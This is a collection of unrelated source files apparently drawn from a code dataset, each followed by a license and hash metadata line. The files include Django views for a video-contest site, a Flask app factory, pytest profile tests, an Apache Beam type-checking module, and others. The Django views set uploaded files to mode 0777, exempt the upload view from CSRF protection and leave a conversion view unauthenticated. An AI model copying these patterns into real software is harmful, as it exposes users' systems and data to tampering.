# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
if __name__ == "__main__":
main()
| apache-2.0 | 297,183,618,561,606,400 | 32.487805 | 242 | 0.546769 | false |
NicolasBonet/cloud | videosapp/views.py | 1 | 8807 | from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render_to_response, render
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.forms import UserCreationForm
from videosapp.forms import *
from videosapp.models import Concurso
from videosapp.models import Video
from django.core.paginator import Paginator, InvalidPage, EmptyPage
import dateutil.parser
import datetime
import os.path
from django.core.mail import send_mail
from django.conf import settings
from moviepy.editor import *
def index(request):
return render(request, "index.html")
def post_registrarse(request):
if request.user.is_authenticated():
raise Exception("Ya estas registrado");
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
if (request.POST['password2'] != request.POST['password1']):
raise Exception("Las contrasenas no coinciden");
new_user = form.save()
new_user.email = request.POST['email']
new_user.first_name = request.POST['first_name']
new_user.last_name = request.POST['last_name']
new_user.save()
return render_to_response("registro.html", dict(mensajeExito="Usuario creado!"), RequestContext(request))
else:
return render_to_response("registro.html", dict(mensajeError=form.errors), RequestContext(request))
else:
form = UserCreationForm()
return render(request, "registro.html", {
'form': form,
})
def post_concurso(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
vahora = str(datetime.datetime.now())
vahora = vahora.split(' ')
if request.method == 'POST':
form = ConcursoCreationForm(request.POST, request.FILES)
# If data is valid, proceeds to create a new post and redirect the user
if form.is_valid():
if (Concurso.objects.filter(url = request.POST['url'].lower()).count() > 0):
raise Exception("Esa URL ya esta siendo usada por otro concurso");
new_concurso = form.save()
new_concurso.user = request.user
new_concurso.url = new_concurso.url.lower()
new_concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
new_concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
new_concurso.url = request.POST['url'].lower()
new_concurso.save()
return HttpResponseRedirect("/perfil")
else:
return render_to_response("crear_concurso.html", dict(
mensajeError=form.errors, ahora = vahora[0]), RequestContext(request))
else:
form = ConcursoCreationForm()
return render(request, "crear_concurso.html", {
'form': form,
'ahora': vahora[0],
})
def editar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
if request.method == 'POST':
urlNueva = request.POST['url'].lower()
if (Concurso.objects.filter(url = urlNueva).exclude(id = concurso.id).count() > 0):
return render_to_response("editar_concurso.html",
dict(mensajeError = "Url " + urlNueva + " en uso!",
concurso = concurso, ahora = str(concurso.fecha_inicio), fin = str(concurso.fecha_fin)),
RequestContext(request))
concurso.nombre = request.POST['nombre']
concurso.url = urlNueva
concurso.descripcion = request.POST['descripcion']
concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
concurso.save()
return HttpResponseRedirect("/perfil")
ahora = str(concurso.fecha_inicio)
fin = str(concurso.fecha_fin)
return render(request, "editar_concurso.html", {
'ahora': ahora,
'fin': fin,
'concurso': concurso,
})
def borrar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
concurso.delete()
return HttpResponseRedirect("/perfil")
def detalle_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
videos = Video.objects.all().filter(concurso=concurso)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("videosadmin.html", dict(videos=videos, user=request.user))
def perfil(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
#concursos = Concurso.objects.get(user=request.user)
concursos = Concurso.objects.all().filter(user=request.user).order_by('-fecha_inicio')
paginator = Paginator(concursos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
concursos = paginator.page(page)
except (InvalidPage, EmptyPage):
concursos = paginator.page(paginator.num_pages)
return render_to_response("list.html", dict(concursos=concursos, user=request.user), context_instance=RequestContext(request))
def concurso(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
videos = Video.objects.all().filter(concurso=c, convertido=True)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("concurso.html", dict(videos=videos, user=request.user, concurso=c, page=page), RequestContext(request))
@csrf_exempt
def subir_video(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
if request.method == 'POST':
form = UploadForm(request.POST, request.FILES)
if form.is_valid():
video = form.save()
video.convertido = False
video.correo_usuario = request.POST['correo_usuario']
video.nombre_usuario = request.POST['nombre_usuario']
video.apellidos_usuario = request.POST['apellidos_usuario']
video.concurso = Concurso.objects.get(url=urlConcurso)
video.save()
return render_to_response("subir_video.html", dict(concurso=c, mensajeExito="Hemos recibido tu video y los estamos procesado para que sea publicado. Tan pronto el video quede publicado en la pagina del concurso te notificaremos por email"), RequestContext(request))
else:
return render_to_response("subir_video.html", dict(concurso=c, mensajeError=form.errors), RequestContext(request))
else:
form = UploadForm()
return render_to_response("subir_video.html", dict(concurso=c), RequestContext(request))
def convert_video(request):
if (os.path.isfile("temp-audio.m4a")):
return None
video = Video.objects.filter(convertido=False).order_by('fecha_inicio')[:1].get()
videopath = settings.BASE_DIR + settings.STATIC_URL + "videos/" + os.path.basename(video.video.name)
os.chmod(videopath, 0777)
clip = VideoFileClip(videopath)
send_mail('El video convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', '[email protected]', ['[email protected]'])
clip.write_videofile(settings.BASE_DIR + settings.STATIC_URL + "convertidos/" + str(video.id) + ".mp4",
codec='libx264',
audio_codec='aac',
temp_audiofile='temp-audio.m4a',
remove_temp=True
)
send_mail('El video ' + video.nombre + ' ha sido convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', '[email protected]', [video.correo_usuario])
video.convertido = True
video.save()
| agpl-3.0 | 8,715,289,717,513,734,000 | 38.316964 | 277 | 0.660384 | false |
flopezag/fiware-backlog | app/__init__.py | 1 | 2329 | import logging
import os
from flask import Flask
from flask_login import LoginManager
from config import config
from kconfig import settings
__author__ = 'Manuel Escriche'
login_manager = LoginManager()
# login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
login_manager.login_message = "Welcome to FIWARE Backlog Management Website!!!"
def create_app(config_name):
app = Flask(__name__.split('.')[0])
app.config.from_object(config[config_name])
config[config_name].init_app(app)
settings.storeHome = app.config['STORE']
login_manager.init_app(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
from .urgent import urgent as urgent_blueprint
app.register_blueprint(urgent_blueprint, url_prefix='/urgent')
from .accountsdesk import accountsdesk as accountsdesk_blueprint
app.register_blueprint(accountsdesk_blueprint, url_prefix='/accountsdesk')
from .helpdesk import helpdesk as helpdesk_blueprint
app.register_blueprint(helpdesk_blueprint, url_prefix='/helpdesk')
from .lab import lab as lab_blueprint
app.register_blueprint(lab_blueprint, url_prefix='/lab')
from .chapters import chapters as chapters_blueprint
app.register_blueprint(chapters_blueprint, url_prefix='/chapters')
from .enablers import enablers as enablers_blueprint
app.register_blueprint(enablers_blueprint, url_prefix='/enablers')
from .tools import tools as tools_blueprint
app.register_blueprint(tools_blueprint, url_prefix='/tools')
from .delivery import delivery as delivery_blueprint
app.register_blueprint(delivery_blueprint, url_prefix='/delivery')
from .guide import guide as guide_blueprint
app.register_blueprint(guide_blueprint, url_prefix='/guide')
from .coordination import coordination as coordination_blueprint
app.register_blueprint(coordination_blueprint, url_prefix='/coordination')
from .workgroups import workgroups as workgroups_blueprint
app.register_blueprint(workgroups_blueprint, url_prefix='/workgroups')
from .api import api as api_blueprint
app.register_blueprint(api_blueprint, url_prefix='/api')
return app
| apache-2.0 | 266,195,812,630,218,800 | 33.761194 | 79 | 0.750537 | false |
pythonindia/wye | tests/functional/test_edit_profile.py | 1 | 6792 |
import pytest
from .. import base
from .. import factories as f
from .. utils import create_user_verify_login
pytestmark = pytest.mark.django_db
def create_user_type(slug='tutor'):
tutor_type = f.create_usertype(slug=slug, display_name=slug)
return tutor_type
def test_signup_college_poc_flow(base_url, browser, outbox):
create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
# mobile number chechk
url = base_url + '/profile/' + user.username + '/edit/'
browser.visit(url)
browser.fill('mobile', '')
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Use first name and last name
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# occupation is required
browser.fill('first_name', 'First Name')
browser.fill('last_name', 'Last Name')
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Sucess case
browser = base.profile_poc_create(
browser, url, None,
section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
def test_signup_tutor_flow(base_url, browser, outbox):
tutor_type = create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(tutor_type)
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
# mobile number chechk
url = base_url + '/profile/' + user.username + '/edit'
browser.visit(url)
browser.fill('mobile', '')
browser.select('usertype', tutor_type.id)
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Github check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('Github or LinkedIn field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present(
'Interested workshop level field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('interested_level', 1)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
browser = base.profile_tutor_create(
browser, url, tutor_type.id, section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
org = f.create_organisation(location=location1)
org.user.add(user)
# section2 = f.create_workshop_section(name='section2')
w1 = f.create_workshop(requester=org, workshop_section=section1)
w1.presenter.add(user)
w2 = f.create_workshop(requester=org, workshop_section=section1)
w2.presenter.add(user)
w3 = f.create_workshop(requester=org, workshop_section=section1)
w3.presenter.add(user)
w4 = f.create_workshop(requester=org, workshop_section=section1)
w4.presenter.add(user)
w5 = f.create_workshop(requester=org, workshop_section=section1)
w5.presenter.add(user)
url = base_url + '/profile/' + user.username + '/'
browser.visit(url)
# assert browser.is_text_present('Deactive Account')
| mit | -2,212,431,880,996,849,200 | 36.944134 | 75 | 0.686543 | false |
shawnhermans/cyborg-identity-manager | cyborg_identity/migrations/0003_auto_20150628_2144.py | 1 | 1089 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cyborg_identity', '0002_iscontactemailaddress_iscontactphonenumber_phonenumber'),
]
operations = [
migrations.RemoveField(
model_name='emailaddress',
name='node_ptr',
),
migrations.RemoveField(
model_name='iscontactemailaddress',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='iscontactphonenumber',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='phonenumber',
name='node_ptr',
),
migrations.DeleteModel(
name='EmailAddress',
),
migrations.DeleteModel(
name='IsContactEmailAddress',
),
migrations.DeleteModel(
name='IsContactPhoneNumber',
),
migrations.DeleteModel(
name='PhoneNumber',
),
]
| mit | -3,159,675,205,751,116,000 | 24.928571 | 91 | 0.55831 | false |
CalthorpeAnalytics/urbanfootprint | footprint/main/management/tests/footprint_init_test.py | 1 | 2564 | #!/bin/env python
# UrbanFootprint v1.5
# Copyright (C) 2017 Calthorpe Analytics
#
# This file is part of UrbanFootprint version 1.5
#
# UrbanFootprint is distributed under the terms of the GNU General
# Public License version 3, as published by the Free Software Foundation. This
# code is distributed WITHOUT ANY WARRANTY, without implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License v3 for more details; see <http://www.gnu.org/licenses/>.
from unittest import TestCase
from testfixtures import Replacer
from footprint.main.management.commands.footprint_init import FootprintInit
class TestFootprintInit(TestCase):
def test_empty_init(self):
FootprintInit().run_footprint_init(skip=True)
def test_wrong_celery_setting(self):
with Replacer() as r:
r.replace('django.conf.settings.CELERY_ALWAYS_EAGER', False)
with self.assertRaises(Exception):
FootprintInit().run_footprint_init(skip=True)
def test_recalculate_bounds(self):
FootprintInit().run_footprint_init(skip=True, recalculate_bounds=True)
def test_all_publishers(self):
FootprintInit().run_footprint_init(skip=False)
def test_all_publishers_nodb_entity(self):
FootprintInit().run_footprint_init(skip=False, nodb_entity=True)
def test_all_publishers_noimport(self):
FootprintInit().run_footprint_init(skip=False, noimport=True)
def test_all_publishers_nolayer(self):
FootprintInit().run_footprint_init(skip=False, nolayer=True)
def test_all_publishers_noresult(self):
FootprintInit().run_footprint_init(skip=False, noresult=True)
def test_all_publishers_notilestache(self):
FootprintInit().run_footprint_init(skip=False, notilestache=True)
def test_all_publishers_nobuilt_form(self):
FootprintInit().run_footprint_init(skip=False, form=True)
def test_all_publishers_nouser(self):
FootprintInit().run_footprint_init(skip=False, nouser=True)
def test_delete_clones(self):
FootprintInit().run_footprint_init(skip=True, delete_clones=True)
# Doesn't work until we have FutureScenario objects in the test database
def disabled_layer_from_selection(self):
FootprintInit().run_footprint_init(skip=True, test_layer_from_selection=True)
# Doesn't work until we have FutureScenario objects in the test database
def disabled_clone_scenarios(self):
FootprintInit().run_footprint_init(skip=True, test_clone_scenarios=True)
| gpl-3.0 | 66,201,886,796,999,350 | 36.705882 | 85 | 0.726989 | false |
HaroldMills/Vesper | scripts/detector_eval/manual/analyze_classification_edits.py | 1 | 5201 | """
Script that analyzes the classification edits of an archive.
The analysis focuses on changes user "dleick" made to classifications
created by user "cvoss", in order to inform decisions about how to most
efficiently direct classification effort.
"""
from collections import defaultdict
import sqlite3
# Set up Django. This must happen before any use of Django, including
# ORM class imports.
import vesper.util.django_utils as django_utils
django_utils.set_up_django()
from vesper.django.app.models import AnnotationInfo, Processor, User
ANNOTATION_NAME = 'Classification'
DETECTOR_NAMES = frozenset([
'BirdVoxDetect 0.1.a0 AT 05',
'MPG Ranch Thrush Detector 0.0 40',
'MPG Ranch Tseep Detector 0.0 40'
])
DATABASE_FILE_NAME = 'Archive Database.sqlite'
QUERY = '''
select e.clip_id, e.action, e.value, e.creating_user_id, e.creation_time
from vesper_string_annotation_edit as e
join vesper_clip as c on e.clip_id = c.id
where c.creating_processor_id = ?
and e.info_id = ?
and e.creation_time >= ?;
'''
START_DATE = '2019-04-01'
def main():
annotation_info = AnnotationInfo.objects.get(name=ANNOTATION_NAME)
users = get_users()
for processor in Processor.objects.all():
if processor.name in DETECTOR_NAMES:
print('{}:'.format(processor.name))
edits = get_classification_edits(processor.id, annotation_info.id)
analyze_edits(edits, users)
def get_users():
return dict((u.id, u.username) for u in User.objects.all())
def get_classification_edits(detector_id, annotation_info_id):
connection = sqlite3.connect(DATABASE_FILE_NAME)
values = (detector_id, annotation_info_id, START_DATE)
with connection:
rows = connection.execute(QUERY, values)
edits = defaultdict(list)
for clip_id, action, value, user_id, time in rows:
edits[clip_id].append((action, value, user_id, time))
connection.close()
return edits
def analyze_edits(edit_lists, user_names):
history_counts = count_edit_histories(edit_lists, user_names)
change_counts = count_changes(history_counts)
# print(' history counts:')
# histories = sorted(history_counts.keys())
# for history in histories:
# print(' {} {}'.format(history, history_counts[history]))
print(" Debbie's classification change counts:")
changes = sorted(change_counts.keys())
for old, new in changes:
count = change_counts[(old, new)]
print(' {} -> {} {}'.format(old, new, count))
num_changes = sum(change_counts.values())
total_num_clips = sum(history_counts.values())
changed_percent = 100 * num_changes / total_num_clips
print((
" Debbie changed Carrie's classifications for {} of {} clips, "
'or {:.1f} percent.').format(
num_changes, total_num_clips, changed_percent))
def count_edit_histories(edit_lists, user_names):
counts = defaultdict(int)
clip_ids = sorted(edit_lists.keys())
for clip_id in clip_ids:
edits = edit_lists[clip_id]
histories = tuple([get_count_key(e, user_names) for e in edits])
counts[histories] += 1
return counts
def get_count_key(edit, user_names):
action, classification, user_id, _ = edit
if user_id is None:
user_name = 'transfer'
else:
user_name = user_names[user_id]
if action == 'S':
return (user_name, classification)
elif action == 'D':
return (user_name, 'Unclassified')
else:
raise ValueError('Unrecognized edit action "{}".'.format(action))
def count_changes(history_counts):
change_counts = defaultdict(int)
for edits, count in history_counts.items():
if edits[-1][0] == 'dleick':
# Debbie made final edit in this history
debbie_classification = edits[-1][1]
i = find_final_carrie_edit(edits)
if i == -1:
# history includes no Carrie edits
accumulate_change_count(
change_counts, 'Unclassified', debbie_classification,
count)
else:
# history includes at least one Carrie edit
carrie_classification = edits[i][1]
accumulate_change_count(
change_counts, carrie_classification,
debbie_classification, count)
return change_counts
def find_final_carrie_edit(edits):
for i, (name, _) in enumerate(reversed(edits)):
if name == 'cvoss':
return len(edits) - i - 1
return -1
def accumulate_change_count(change_counts, old, new, count):
if new != old and not (old == 'Unclassified' and new == 'Noise'):
change_counts[(old, new)] += count
if __name__ == '__main__':
main()
| mit | -7,949,347,712,655,548,000 | 26.962366 | 78 | 0.585849 | false |
aaltay/beam | sdks/python/apache_beam/typehints/typecheck.py | 1 | 12441 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Runtime type checking support.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import collections
import inspect
import types
from future.utils import raise_with_traceback
from past.builtins import unicode
from apache_beam import pipeline
from apache_beam.pvalue import TaggedOutput
from apache_beam.transforms import core
from apache_beam.transforms.core import DoFn
from apache_beam.transforms.window import WindowedValue
from apache_beam.typehints.decorators import GeneratorWrapper
from apache_beam.typehints.decorators import TypeCheckError
from apache_beam.typehints.decorators import _check_instance_type
from apache_beam.typehints.decorators import getcallargs_forhints
from apache_beam.typehints.typehints import CompositeTypeHintError
from apache_beam.typehints.typehints import SimpleTypeHintError
from apache_beam.typehints.typehints import check_constraint
class AbstractDoFnWrapper(DoFn):
"""An abstract class to create wrapper around DoFn"""
def __init__(self, dofn):
super(AbstractDoFnWrapper, self).__init__()
self.dofn = dofn
def _inspect_start_bundle(self):
return self.dofn.get_function_arguments('start_bundle')
def _inspect_process(self):
return self.dofn.get_function_arguments('process')
def _inspect_finish_bundle(self):
return self.dofn.get_function_arguments('finish_bundle')
def wrapper(self, method, args, kwargs):
return method(*args, **kwargs)
def setup(self):
return self.dofn.setup()
def start_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.start_bundle, args, kwargs)
def process(self, *args, **kwargs):
return self.wrapper(self.dofn.process, args, kwargs)
def finish_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.finish_bundle, args, kwargs)
def teardown(self):
return self.dofn.teardown()
class OutputCheckWrapperDoFn(AbstractDoFnWrapper):
"""A DoFn that verifies against common errors in the output type."""
def __init__(self, dofn, full_label):
super(OutputCheckWrapperDoFn, self).__init__(dofn)
self.full_label = full_label
def wrapper(self, method, args, kwargs):
try:
result = method(*args, **kwargs)
except TypeCheckError as e:
# TODO(BEAM-10710): Remove the 'ParDo' prefix for the label name
error_msg = (
'Runtime type violation detected within ParDo(%s): '
'%s' % (self.full_label, e))
raise_with_traceback(TypeCheckError(error_msg))
else:
return self._check_type(result)
@staticmethod
def _check_type(output):
if output is None:
return output
elif isinstance(output, (dict, bytes, str, unicode)):
object_type = type(output).__name__
raise TypeCheckError(
'Returning a %s from a ParDo or FlatMap is '
'discouraged. Please use list("%s") if you really '
'want this behavior.' % (object_type, output))
elif not isinstance(output, collections.Iterable):
raise TypeCheckError(
'FlatMap and ParDo must return an '
'iterable. %s was returned instead.' % type(output))
return output
class TypeCheckWrapperDoFn(AbstractDoFnWrapper):
"""A wrapper around a DoFn which performs type-checking of input and output.
"""
def __init__(self, dofn, type_hints, label=None):
super(TypeCheckWrapperDoFn, self).__init__(dofn)
self._process_fn = self.dofn._process_argspec_fn()
if type_hints.input_types:
input_args, input_kwargs = type_hints.input_types
self._input_hints = getcallargs_forhints(
self._process_fn, *input_args, **input_kwargs)
else:
self._input_hints = None
# TODO(robertwb): Multi-output.
self._output_type_hint = type_hints.simple_output_type(label)
def wrapper(self, method, args, kwargs):
result = method(*args, **kwargs)
return self._type_check_result(result)
def process(self, *args, **kwargs):
if self._input_hints:
actual_inputs = inspect.getcallargs(self._process_fn, *args, **kwargs) # pylint: disable=deprecated-method
for var, hint in self._input_hints.items():
if hint is actual_inputs[var]:
# self parameter
continue
_check_instance_type(hint, actual_inputs[var], var, True)
return self._type_check_result(self.dofn.process(*args, **kwargs))
def _type_check_result(self, transform_results):
if self._output_type_hint is None or transform_results is None:
return transform_results
def type_check_output(o):
# TODO(robertwb): Multi-output.
x = o.value if isinstance(o, (TaggedOutput, WindowedValue)) else o
self.type_check(self._output_type_hint, x, is_input=False)
# If the return type is a generator, then we will need to interleave our
# type-checking with its normal iteration so we don't deplete the
# generator initially just by type-checking its yielded contents.
if isinstance(transform_results, types.GeneratorType):
return GeneratorWrapper(transform_results, type_check_output)
for o in transform_results:
type_check_output(o)
return transform_results
@staticmethod
def type_check(type_constraint, datum, is_input):
"""Typecheck a PTransform related datum according to a type constraint.
This function is used to optionally type-check either an input or an output
to a PTransform.
Args:
type_constraint: An instance of a typehints.TypeContraint, one of the
white-listed builtin Python types, or a custom user class.
datum: An instance of a Python object.
is_input: True if 'datum' is an input to a PTransform's DoFn. False
otherwise.
Raises:
TypeError: If 'datum' fails to type-check according to 'type_constraint'.
"""
datum_type = 'input' if is_input else 'output'
try:
check_constraint(type_constraint, datum)
except CompositeTypeHintError as e:
raise_with_traceback(TypeCheckError(e.args[0]))
except SimpleTypeHintError:
error_msg = (
"According to type-hint expected %s should be of type %s. "
"Instead, received '%s', an instance of type %s." %
(datum_type, type_constraint, datum, type(datum)))
raise_with_traceback(TypeCheckError(error_msg))
class TypeCheckCombineFn(core.CombineFn):
"""A wrapper around a CombineFn performing type-checking of input and output.
"""
def __init__(self, combinefn, type_hints, label=None):
self._combinefn = combinefn
self._input_type_hint = type_hints.input_types
self._output_type_hint = type_hints.simple_output_type(label)
self._label = label
def setup(self, *args, **kwargs):
self._combinefn.setup(*args, **kwargs)
def create_accumulator(self, *args, **kwargs):
return self._combinefn.create_accumulator(*args, **kwargs)
def add_input(self, accumulator, element, *args, **kwargs):
if self._input_type_hint:
try:
_check_instance_type(
self._input_type_hint[0][0].tuple_types[1],
element,
'element',
True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return self._combinefn.add_input(accumulator, element, *args, **kwargs)
def merge_accumulators(self, accumulators, *args, **kwargs):
return self._combinefn.merge_accumulators(accumulators, *args, **kwargs)
def compact(self, accumulator, *args, **kwargs):
return self._combinefn.compact(accumulator, *args, **kwargs)
def extract_output(self, accumulator, *args, **kwargs):
result = self._combinefn.extract_output(accumulator, *args, **kwargs)
if self._output_type_hint:
try:
_check_instance_type(
self._output_type_hint.tuple_types[1], result, None, True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return result
def teardown(self, *args, **kwargs):
self._combinefn.teardown(*args, **kwargs)
class TypeCheckVisitor(pipeline.PipelineVisitor):
_in_combine = False
def enter_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = True
self._wrapped_fn = applied_transform.transform.fn = TypeCheckCombineFn(
applied_transform.transform.fn,
applied_transform.transform.get_type_hints(),
applied_transform.full_label)
def leave_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = False
def visit_transform(self, applied_transform):
transform = applied_transform.transform
if isinstance(transform, core.ParDo):
if self._in_combine:
if isinstance(transform.fn, core.CombineValuesDoFn):
transform.fn.combinefn = self._wrapped_fn
else:
transform.fn = transform.dofn = OutputCheckWrapperDoFn(
TypeCheckWrapperDoFn(
transform.fn,
transform.get_type_hints(),
applied_transform.full_label),
applied_transform.full_label)
class PerformanceTypeCheckVisitor(pipeline.PipelineVisitor):
def visit_transform(self, applied_transform):
transform = applied_transform.transform
full_label = applied_transform.full_label
# Store output type hints in current transform
output_type_hints = self.get_output_type_hints(transform)
if output_type_hints:
transform._add_type_constraint_from_consumer(
full_label, output_type_hints)
# Store input type hints in producer transform
input_type_hints = self.get_input_type_hints(transform)
if input_type_hints and len(applied_transform.inputs):
producer = applied_transform.inputs[0].producer
if producer:
producer.transform._add_type_constraint_from_consumer(
full_label, input_type_hints)
def get_input_type_hints(self, transform):
type_hints = transform.get_type_hints()
input_types = None
if type_hints.input_types:
normal_hints, kwarg_hints = type_hints.input_types
if kwarg_hints:
input_types = kwarg_hints
if normal_hints:
input_types = normal_hints
parameter_name = 'Unknown Parameter'
if hasattr(transform, 'fn'):
try:
argspec = inspect.getfullargspec(transform.fn._process_argspec_fn())
except TypeError:
# An unsupported callable was passed to getfullargspec
pass
else:
if len(argspec.args):
arg_index = 0
if argspec.args[0] == 'self' and len(argspec.args) > 1:
arg_index = 1
parameter_name = argspec.args[arg_index]
if isinstance(input_types, dict):
input_types = (input_types[argspec.args[arg_index]], )
if input_types and len(input_types):
input_types = input_types[0]
return parameter_name, input_types
def get_output_type_hints(self, transform):
type_hints = transform.get_type_hints()
output_types = None
if type_hints.output_types:
normal_hints, kwarg_hints = type_hints.output_types
if kwarg_hints:
output_types = kwarg_hints
if normal_hints:
output_types = normal_hints
if output_types and len(output_types):
output_types = output_types[0]
return None, output_types
| apache-2.0 | -7,856,147,975,945,957,000 | 35.06087 | 113 | 0.685958 | false |
xuhdev/nikola | nikola/plugins/basic_import.py | 1 | 7341 | # -*- coding: utf-8 -*-
# Copyright © 2012-2017 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
